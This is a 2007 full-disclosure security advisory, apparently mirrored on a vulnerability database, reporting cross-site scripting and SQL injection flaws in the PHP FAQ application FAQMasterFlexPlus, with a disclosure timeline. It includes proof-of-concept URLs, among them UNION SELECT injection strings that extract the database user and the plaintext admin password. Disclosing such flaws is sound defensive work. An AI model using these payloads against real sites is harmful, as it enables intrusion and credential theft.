Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18758
HistoryDec 28, 2007 - 12:00 a.m.

[Full-disclosure] FAQMasterFlexPlus multiple vulnerabilities

2007-12-2800:00:00
vulners.com
23
JSON

  • Security Advisory -

  • FAQMasterFlexPlus multiple vulnerabilities -

Product: FAQMasterFlexPlus
Version: Latest version is affected, other not tested
Vendor: http://www.netbizcity.com
Affected by: Cross-Site Scripting & SQL injection

I. Introduction.

FaqMasterFlexPlus is a free, database-driven web-based application written
in php for creating and maintaining
Frequently Asked Questions (FAQs) on your web site.
It has language support and features according documentation are: "Allow to
create unlimited categories and unlimited
Questions/Answers and has web-based category and FAQ administration with
Add, Edit, Delete Capability.",

It's free software, released under the GNU General Public Lisence (GPL).
Works with php & mysql and comes bundled in some versions of Fantastico
(Cpanel X).

II. Description

Multiple flaws in FaqMasterFlexPlus have been discovered:

1) Cross Site Scripting:

The script faq.php suffers an XSS bug, specifically the variable $cat_name
it's not properly sanitized,
an attacker exploiting this flaw can perform an XSS attack to access the
targeted user cookies.

All Admin scripts to add/edit/delete categories and add/edit/delete faq
don't parse correctly the user supplied input too.

PoC:
http://www.example.com/[path/to/faq/]/faq.php?category_id=1&cat_name=[XSS]

2) SQL Injection (to exploit this issue it's necesarry magic_quotes_gpc set
to Off in the php.ini file).

All the scripts suffers for sql injections attacks in the querys to the
database.

PoC:
http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,user(),1/*

Then get a new line like this:

Q faquser@localhost

or a Proof of Concept to get the admin password:

http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,passwrd,1%20from%20users%20where%20userid='admin

Q supersecretpassword

bingo! ;)

Besides password is stored in plain text, this is a big security flaw.

This software is infected with many bugs and must be fully audited for
enforce the security.

III. Timeline

08/05/2007 - Bugs discovered
10/05/2007 - Vendor Contact (No Response)
12/12/2007 - Vendor Contacted Again (No Response)
28/12/2007 - Advisory Disclosure

IV. Credits

Juan Galiana <jgaliana gmail com>

Regards

JSON